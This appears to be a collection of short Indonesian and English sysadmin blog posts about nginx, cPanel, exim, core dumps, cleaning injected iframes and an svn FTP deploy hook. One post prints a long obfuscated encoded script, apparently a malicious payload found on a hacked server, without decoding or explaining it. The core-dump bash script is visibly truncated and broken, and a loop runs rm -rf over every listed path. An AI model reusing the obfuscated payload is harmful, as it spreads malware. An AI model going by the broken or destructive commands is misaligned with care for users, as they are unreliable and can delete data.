Just another quick post :
- Ubah setting $config['uri_protocol'] ke REQUEST_URI
- Edit file nginx.conf untuk virtual host yg pakai CI. Rewrite rule :
if (!-e $request_filename) {
rewrite ^(.*) /index.php?$1 last;
}
- Restart nginx
Cara nyari file yang kena injeksi iframe :
grep ... * | grep iframe
Cara hapusnya :
find . -name '*.*' | xargs perl -pi -e 's/^.*\<iframe src.*chura\.pl.*$/ /g'
Dari contoh diatas, iframe src yang ketemu mengarah ke chura.pl . Makanya pada perintah kedua, input chura.pl dimasukkan supaya kode iframe langsung dihapus dan ngga berpengaruh ke iframe lainnya di file yang sama (kalau memang ada).
Cuma buat ngasih tau kalau blog ini masih ada.. Ngga penting banget sih sebenernya.. wkwkwk.
Selama ini sih belum pernah nemu cpanel server yang mail server nya termasuk open relay. Lucu juga kalau ngeliat beberapa test memastikan bahwa server CPanel bisa digunakan untuk relaying emails. Oh ya, kalau mau iseng ngetes, bisa lewat sini, http://www.checkor.com/atau sini.
Sedekat yang saya tahu, pengecekan -di cpanel- untuk relay atau ngga dilakukan dari daemon antirelayd. Semua user yang sudah login ke mail server akan dimasukkan ke log (/var/log/maillog), dan apabila valid, host/IP nya akan dimasukkan juga untuk sementara (30 menitan) ke /etc/relayhosts. Yang artinya tidak akan ada pengecekan authentikasi user email ke server dalam 30 menit.
Jadi, hanya user yang ter-autentikasi yang bisa mengirimkan email. Yang tidak? Ke laut aja. 
Terus open relaynya dimana??
Cpanel -actually- has 2 scripts in /scripts/ folder to check and install ImageMagick. They are /scripts/checkimagemagick to check whether ImageMagick has been installed or not, and /scripts/installimagemagick to install ImageMagick (if you got message ‘missing’ after execute /scripts/checkimagemagick).
After installing ImageMagick through /scripts/installimagemagick, make sure you have enabled imagick in PHP PECL (Module Installer >> PHP PECL . click ‘manage’ button). And then restart apache / httpd
Fiuh.. It was easier than i thought.. 
So far, i’ve found smbind, wmbind, dns-control, binder and of course, the lovely webmin .
I, personally, fell in love with webmin. It’s a great tool. But my partner doesn’t like it. So maybe i should write another tool for web-based DNS management for bind. Wish me luck!
Here’s small script to find any core dump files generated in /home directory :
#!/bin/bash for((i=0;i> searchcoredump.txt
Use searchcoredump.txt to analyze every core dump file you’ve found. Or you can delete it one by one.
[root@pengki ~]# for hapus in `cat /root/searchcoredump.txt`; do rm -rf $hapus; done
Finding core dump files will take a loooong time if your home directory is big (in size, and node). You can use screen command to let the machine works for you so you can do another thing (or have a nice sleep ).
Problem :
Apr 21 16:14:32 iix2a exim[12756]: 2009-04-21 16:14:32 1LwC3k-0003Jk-4w Cannot open main log file "/var/log/exim_mainlog": Permission denied: euid=47 egid=12
Solution :
- Try to change /var and /var/log permission to 755. and restart exim
If the first solution still doesn’t work, do this :
- rename exim_mainlog (/var/log/exim_mainlog) to whatever-you-want
- recreate exim_mainlog : touch exim_mainlog (/var/log/exim_mainlog)
- change ownership of exim_mainlog to mailnull and group to mail . (chown mailnull:mail exim_mainlog)
- restart exim
Pernah nemu script begini ?
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
Dibawah ini script sederhana buat post-commit hook-nya svn. Setelah developer melakukan commit / ngeluarin revisi, maka kode2 yang baru akan diupdate di live server via FTP (lebih prefer FTP daripada scp atau rsync, walaupun katanya lebih lambat juga ).
svn co URL-ke-repository-project temp-local-directory --username username-repo --password password-repo /usr/bin/ncftpput -R -u usernameftp -p passwordftp hostname remotedir temp-local-dir
Dan kode itu entah hasil oprekan saya yang keberapa. fiuh.
*curhat*
